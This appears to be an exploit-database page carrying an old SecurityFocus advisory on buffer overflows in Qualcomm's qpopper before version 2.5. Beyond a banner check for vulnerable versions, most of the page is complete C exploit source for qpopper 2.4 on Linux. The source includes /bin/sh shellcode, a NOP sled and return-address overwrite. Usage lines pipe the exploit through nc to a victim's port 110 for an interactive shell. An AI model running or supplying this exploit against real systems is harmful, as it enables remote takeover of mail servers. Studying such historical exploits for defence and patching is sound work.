source: http://www.securityfocus.com/bid/133/info
A number of buffer-overflow issues reside in versions prior to 2.5 of Qualcomm's 'qpopper' program. Exploiting this issue allows a remote attacker to execute arbitrary commands on hosts that are running a vulnerable version.
To determine if you are vulnerable, telnet to port 110 on the possibly vulnerable host. A banner appears, informing you of the version of the pop server. For example:
% telnet yourmailhost.your.domain.com 110
Trying 123.123.123.123
Connected to mailhost
+OK QPOP (version 2.4) at yourmailhost.your.domain.com starting
If any version prior to 2.5 is reported, including 2.5 beta, you should upgrade immediately to the latest version.
/* Exploit for qpopper 2.4 (and others) for Linux
* by [WaR] ([email protected]) and zav ([email protected])
*
* usage: (./qpopper <offset>;cat)|nc <victim> 110
* with offset around 1000 (try increments of 50)
*
*
* shout outs to: Zef and YZF
*/
#include <stdio.h>
#include <stdlib.h>
#define BUFFSIZE 998
char shell[] =
"\xeb\x33\x5e\x89\x76\x08\x31\xc0"
"\x88\x66\x07\x83\xee\x02\x31\xdb"
"\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
"\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
"\xee\x02\x8d\x5e\x0e\x89\xda\x83"
"\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
"\xff\xff/bin/sh";
unsigned long esp()
{
__asm__(" movl %esp,%eax ");
}
main(int argc, char **argv)
{
int i,j,offset;
unsigned long eip;
char buffer[4096];
j=0;
offset=atoi(argv[1]);
eip=esp()+offset;
for(i=0;i<1008;i++) buffer[i]=0x90;
for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++];
i=1005;
buffer[i]=eip & 0xff;
buffer[i+1]=(eip >> 8) & 0xff;
buffer[i+2]=(eip >> 16) & 0xff;
buffer[i+3]=(eip >> 24) & 0xff;
printf("%s\nsh -i\n",buffer);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation